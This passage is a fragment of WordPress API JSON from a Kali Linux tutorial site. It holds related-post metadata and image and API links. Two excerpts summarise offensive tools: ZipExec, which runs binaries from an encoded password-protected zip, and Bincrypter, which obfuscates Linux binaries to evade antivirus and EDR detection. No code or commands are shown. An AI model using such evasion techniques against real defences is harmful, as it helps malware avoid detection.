https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHFoftROls_al2XKB1WYiINrZfyPSsdyOchmkQ91DkxTlbqKA5gfV2p2aWkfmsxFHhaBTeWvhfVByAKCJVuiYRkdiNgMIkeCfShRFroNWhAy35o334ul6m-DBCXmnjCUF7DCANFDfXgqsOpRCPjKZIRqYX4sJim0aTG81vsFeJ-KP1P1tGMg4M7bp3\/s16000\/scan.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":21366,"url":"https:\/\/kalilinuxtutorials.com\/zipexec\/","url_meta":{"origin":33706,"position":4},"title":"ZipExec : A Unique Technique To Execute Binaries From A Password Protected Zip","author":"R K","date":"January 26, 2022","format":false,"excerpt":"ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg_96lH6nOYw0JFWLukiWXp_4kFJi5jErFd-Xp1lUARCGhRrqX7ozd6dgsD8GQ9uAyaIWK_0YcP16YOjomQlLgpc2XnrC35YFS0L-sdjbBo9ZXxQJQb33-UUOCHD7IsMyxgczKHqHzSpLlqH_Yk23KzK1dpVvmWJ-P4ya8BqDlDtBLX-VJIkntk9_AU=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg_96lH6nOYw0JFWLukiWXp_4kFJi5jErFd-Xp1lUARCGhRrqX7ozd6dgsD8GQ9uAyaIWK_0YcP16YOjomQlLgpc2XnrC35YFS0L-sdjbBo9ZXxQJQb33-UUOCHD7IsMyxgczKHqHzSpLlqH_Yk23KzK1dpVvmWJ-P4ya8BqDlDtBLX-VJIkntk9_AU=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg_96lH6nOYw0JFWLukiWXp_4kFJi5jErFd-Xp1lUARCGhRrqX7ozd6dgsD8GQ9uAyaIWK_0YcP16YOjomQlLgpc2XnrC35YFS0L-sdjbBo9ZXxQJQb33-UUOCHD7IsMyxgczKHqHzSpLlqH_Yk23KzK1dpVvmWJ-P4ya8BqDlDtBLX-VJIkntk9_AU=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg_96lH6nOYw0JFWLukiWXp_4kFJi5jErFd-Xp1lUARCGhRrqX7ozd6dgsD8GQ9uAyaIWK_0YcP16YOjomQlLgpc2XnrC35YFS0L-sdjbBo9ZXxQJQb33-UUOCHD7IsMyxgczKHqHzSpLlqH_Yk23KzK1dpVvmWJ-P4ya8BqDlDtBLX-VJIkntk9_AU=s728 2x"},"classes":[]},{"id":37370,"url":"https:\/\/kalilinuxtutorials.com\/bincrypter\/","url_meta":{"origin":33706,"position":5},"title":"Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation","author":"Varshini","date":"March 28, 2025","format":false,"excerpt":"Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to obfuscate and encrypt ELF binaries and #!-scripts, providing a robust layer of protection against reverse engineering and detection by antivirus and endpoint detection and response (EDR) systems. Key Features Of Bincrypter Obfuscation and Encryption: Bincrypter\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/Bincrypter-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/33706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=33706"}],"version-history":[{"count":2,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/33706\/revisions"}],"predecessor-version":[{"id":33708,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/33706\/revisions\/33708"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/33709"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=33706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=33706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=33706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}